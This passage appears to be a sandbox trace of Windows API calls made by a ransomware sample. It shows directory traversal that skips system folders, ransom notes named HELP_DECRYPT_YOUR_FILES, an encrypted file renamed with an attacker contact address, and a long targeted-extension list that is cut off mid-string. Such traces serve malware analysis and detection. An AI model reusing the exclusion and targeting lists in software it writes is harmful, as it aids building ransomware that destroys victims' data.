	[0172.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0172.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0172.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0172.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.021] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0172.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.021] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0172.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.021] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0172.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.022] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0172.022] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.022] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0172.022] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.022] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0172.022] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.022] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0172.023] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0172.023] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0172.023] FindNextFileW (in: hFindFile=0xfb9270, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x800cf7ad, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="..", cAlternateFileName="")) returned 1
	[0172.023] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0172.023] FindNextFileW (in: hFindFile=0xfb9270, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x800cf7ad, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x800cf7ad, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x800f5d5d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0172.023] FindNextFileW (in: hFindFile=0xfb9270, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x800a9a91, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x800a9a91, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x800cf7ad, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0172.023] FindNextFileW (in: hFindFile=0xfb9270, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0fddd6c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0fddd6c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1003fe2, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x168, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0172.023] FindNextFileW (in: hFindFile=0xfb9270, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1003fe2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1003fe2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1003fe2, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x168, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1
	[0172.023] FindNextFileW (in: hFindFile=0xfb9270, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1003fe2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1003fe2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1003fe2, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x168, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 0
	[0172.024] FindClose (in: hFindFile=0xfb9270 | out: hFindFile=0xfb9270) returned 1
	[0172.024] FindClose (in: hFindFile=0xfb9270 | out: hFindFile=0xfb9270) returned 0
	[0172.024] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ff9e90a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7ff9e90a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ffc49e4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 1
	[0172.024] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ff9e90a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7ff9e90a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ffc49e4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 0
	[0172.032] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0172.032] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0172.033] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0172.033] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0172.033] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0172.033] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{23cb517f-5073-4e96-a202-7fe6122a2271}", cAlternateFileName="{23CB5~1")) returned 1
	[0172.034] lstrcmpW (lpString1="{23cb517f-5073-4e96-a202-7fe6122a2271}", lpString2="..") returned 1
	[0172.034] lstrcmpW (lpString1="{23cb517f-5073-4e96-a202-7fe6122a2271}", lpString2=".") returned 1
	[0172.034] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning") returned="C:\\Users\\All Users\\Microsoft\\Provisioning"
	[0172.034] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\"
	[0172.034] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\", lpString2="{23cb517f-5073-4e96-a202-7fe6122a2271}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}"
	[0172.034] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}"
	[0172.034] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\"
	[0172.034] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\"
	[0172.035] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*"
	[0172.035] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0172.042] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*") returned 84
	[0172.042] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.042] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*") returned 0x54
	[0172.042] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.042] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="windows") returned 0x0
	[0172.043] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.043] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="boot") returned 0x0
	[0172.043] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.043] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="system volume information") returned 0x0
	[0172.043] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.043] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0172.043] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.044] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="temp") returned 0x0
	[0172.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.044] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="program files") returned 0x0
	[0172.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.044] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0172.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.045] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="appdata") returned 0x0
	[0172.045] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.045] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="application data") returned 0x0
	[0172.045] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.045] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="winnt") returned 0x0
	[0172.045] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.046] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="tmp") returned 0x0
	[0172.046] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.046] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="cache") returned 0x0
	[0172.046] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.046] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0172.046] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.047] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="webcache") returned 0x0
	[0172.047] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.047] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="inetcache") returned 0x0
	[0172.047] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.047] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="nvidia") returned 0x0
	[0172.047] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.047] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="packages") returned 0x0
	[0172.048] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.048] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="cookies") returned 0x0
	[0172.048] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.048] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="programdata") returned 0x0
	[0172.048] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0172.048] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa15d3ecf, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa15d3ecf, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa15fa13e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x159d, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1
	[0172.048] lstrcmpW (lpString1="customizations.xml", lpString2="..") returned 1
	[0172.049] lstrcmpW (lpString1="customizations.xml", lpString2=".") returned 1
	[0172.049] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\"
	[0172.049] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\", lpString2="customizations.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml"
	[0172.049] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml") returned 99
	[0172.049] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.049] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml", cchLength=0x63 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml") returned 0x63
	[0172.049] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.050] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0172.050] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml"
	[0172.050] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml") returned 99
	[0172.050] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.050] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.050] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0172.051] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.051] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv